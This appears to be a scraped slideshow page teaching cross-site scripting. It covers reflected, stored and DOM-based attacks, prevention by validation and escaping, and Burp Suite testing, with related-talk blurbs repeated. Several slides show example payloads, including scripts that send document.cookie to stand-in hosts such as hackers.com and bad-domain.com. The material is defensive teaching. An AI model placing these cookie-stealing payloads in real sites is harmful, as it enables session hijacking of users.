Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
This presentation covers the Cross site scripting attacks and defences in web applications, this talk was delivered as part of OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
This presentation covers the Cross site scripting attacks and defences in web applications, this talk was delivered as part of OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:-
A) Reflective-(Non-Persistent Cross-site Scripting)
- What is Reflective Cross-site scripting.
- Testing for Reflected Cross site scripting
How to Test
- Black Box testing
- Bypass XSS filters
- Gray Box testing
Tools
Defending Against Reflective Cross-site scripting.
Examples of Reflective Cross-Site Scripting Attacks.
B) Stored -(Persistent Cross-site Scripting)
What is Stored Cross-site scripting.
How to Test
- Black Box testing
- Gray Box testing
Tools
Defending Against Stored Cross-site scripting.
Examples of Stored Cross-Site Scripting Attacks.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharSandeep Kumbhar
Introduction
Impact of XSS attacks
Types of XSS attacks
Detection of XSS attacks
Prevention of XSS attacks
At client side
At Server-side
Conclusion
References
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:-
A) Reflective-(Non-Persistent Cross-site Scripting)
- What is Reflective Cross-site scripting.
- Testing for Reflected Cross site scripting
How to Test
- Black Box testing
- Bypass XSS filters
- Gray Box testing
Tools
Defending Against Reflective Cross-site scripting.
Examples of Reflective Cross-Site Scripting Attacks.
B) Stored -(Persistent Cross-site Scripting)
What is Stored Cross-site scripting.
How to Test
- Black Box testing
- Gray Box testing
Tools
Defending Against Stored Cross-site scripting.
Examples of Stored Cross-Site Scripting Attacks.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharSandeep Kumbhar
Introduction
Impact of XSS attacks
Types of XSS attacks
Detection of XSS attacks
Prevention of XSS attacks
At client side
At Server-side
Conclusion
References
Misconfiguration is define as configuration mistakes that results in unintended application behavior that includes misuse of default passwords, privileges, and excessive debugging information disclosure
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
With the increased number of web applications, web security is be- coming more and more significant. Cross-Site Scripting vulnerability, abbreviated as XSS, is a common web vulnerability. Exploiting XSS vulnerabilities can cause hijacked user sessions, malicious code injec- tions into web applications, and critical information stealing. This article gives brief information about XSS, discusses its types, and de- signs a demo website to demonstrate attack processes of common XSS exploitation scenarios. The article also shows how to prevent XSS at- tacks with code illustrations.
Abstract
With the increased number of web applications, web security is be- coming more and more significant. Cross-Site Scripting vulnerability, abbreviated as XSS, is a common web vulnerability. Exploiting XSS vulnerabilities can cause hijacked user sessions, malicious code injec- tions into web applications, and critical information stealing. This article gives brief information about XSS, discusses its types, and de- signs a demo website to demonstrate attack processes of common XSS exploitation scenarios. The article also shows how to prevent XSS at- tacks with code illustrations.
2. What is XSS Cross Site Scripting XSS is a vulnerability which when present in websites or web applications, allows malicious users (Hackers) to insert their client side code(normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of that page.
3. XSS (-ve) effects stealing other user’s cookies stealing their private information performing actions on behalf of other users redirecting to other websites Showing ads in hidden IFRAMES and pop-ups
4. How XSS works Web server gets data from web client (POST, GET, COOKIES etc) with the request. So a malicious User can include client side code snippets (JavaScript) into the data. For example : Amit<script>alert (‘this site has been hacked’) ;</script>
5. XSS input Note: This image has been created using Firebug and this XSS hole is not present in google.com
6. XSS contd. Let’s assume Web server performs no validationor filtration on this data. Now web server either saves this data + XSS code to some persistent storage (like database) or print this data back in the HTML. When this XSS code, comes from server along with HTML into the web client (Browser) and executes as server’s own code, it gets access whole HTML document, page URL, cookies etc.
7. XSS Server http request with XSS JavaScript http response with XSS JavaScript Hacker’s Browser Hacker’s Browser
8. XSS output Note: This image has been created using Firebug and this XSS hole is not present in google.com
10. Type of XSS attacks Non-persistent Persistent DOM Based
11. Non-persistent When XSS code only gets displayed in the next page to the same user and not gets saved into persistent storage like database. This type of attack is less vulnerable, because Hacker can see only their own cookies and can make modifications in their own current opened pages. The risk with these kinds of XSS holes is that it opens way for Cross Site Request Forgery CSRF. CSRF allows a hacker to place some links Example : same as given previously to explain XSS
12. CSRF Cross-site request forgery is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. This can be done by placing some hidden links in some bad website. for example : <img src="http://bank.example/withdraw?account=bob<script>document.location=‘http://bad-domain.com/store_data?cookie=‘ + document.cookie;</script>
13. CSRF Bank Server Bad Server 1 http request with XSS http response with CSRF Link http response with XSS <img src="http://bank.example/withdraw?account=bob<script>document.location=‘http://bad-domain.com/store_data?cookie=‘ + document.cookie;</script> Bad Server 2 Normal User’s Browser Normal User’s Browser http request with cookies
14. Persistent XSS In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. abc<script>window.location = "http://www.hackers.com?yid=" + document.cookie;</script>
15. Persistent XSS – Step 1 DB Step 1 Server saves XSS code to DB Server http request with XSS JavaScript Hacker’s Browser
16. Persistent XSS – Step 2 DB Step 2 Server saves XSS code to DB Server http request with XSS JavaScript http response with XSS JavaScript Hacker Browser Normal User Browser
17. Persistent XSS Note: This image has been created using Firebug and this XSS hole is not present in blogger.com
18. DOM based attack DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. This is in contrast to other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server side flaw). Example … var pos = document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); … http://www.vulnerable.site/welcome.html?name=Joe
19. Prevention Never trust the user input data No matter where it’s coming from ( GET, POST, COOKIE etc.
20. Validation at client side By performing client side (JavaScript) validation, before submitting the data to server, helps only in usability aspect of the website. It can’t provide any actual security, because user can disable the JavaScript. Many JavaScript libraries and frameworks are available for this. For example in DOJO framework <label for="firstName">First Name: </label> <input type="text" id="firstName" name="firstName" dojoType="dijit.form.ValidationTextBox" required="true" propercase="true" promptMessage="Enter first name." invalidMessage="First name is required." trim="true”/><br>
21. Validation at server By sanitizing the input data, we can prevent the malicious code to enter in the system. Checking the proper data types helps in cleaning the data. First of all we should restrict numeric data for numeric fields and only alphanumeric characters for text fields White lists – Allow <strong>, <em> and <br> only – Does help, but not 100% Blacklists– Block <script> and other attributes such as onload, onclick, onmouseover etc.
22. Escaping output at server Problem characters can include < > " ‘ &.These characters can be replaced with HTML character entities. For example, < can be replaced with <. 5 Rules for escaping output #1 - HTML Escape before inserting into element content #2 - Attribute Escape before inserting into attributes #3 - JavaScript Escape before inserting into JavaScript data values #4 - CSS Escape before inserting into style property values #5 - URL Escape before inserting into URL attributes
23. Escaping text before updating DOM at client side To avoid DOM based XSS attacks.
24. Web vulnerability scanner Applications These applications provide the developer to test their web applications for various types of vulnerabilities. These applications allow navigating through the web sites or web applications and performing various types of attacks (manual or automated). Both free and commercial applications are available (http://sectools.org/web-scanners.html)
25. Burp suite Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. Download: http://portswigger.net/suite/download.html Documentation: http://portswigger.net/suite/help.html
26. Burp Tools Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the end browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions. Spider - an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality. Scanner [Pro version only] - an advanced tool for performing automated discovery of security vulnerabilities in web applications. Intruder- a highly configurable tool for automating customized attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities. Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analyzing the application's responses. Sequencer- a tool for analyzing the quality of randomness in an application's session tokens or other important data items which are intended to be unpredictable. Decoder- a tool for performing manual or intelligent decoding and encoding of application data. Comparer- a utility for performing a visual "diff" between any two items of data, normally pairs of related requests and responses.
28. How to use Run the application and set the browser proxy to localhost: 8080 Open any site and Burp will create a sitemap tree in the left panel, as per the site traversal. Select any URL from the tree and add it to intruder. Add different type of payloads for attack, i.e. 1<script >alert(1);</script> Go to Intruder and click start attack. Burp suite will show the results in a new window.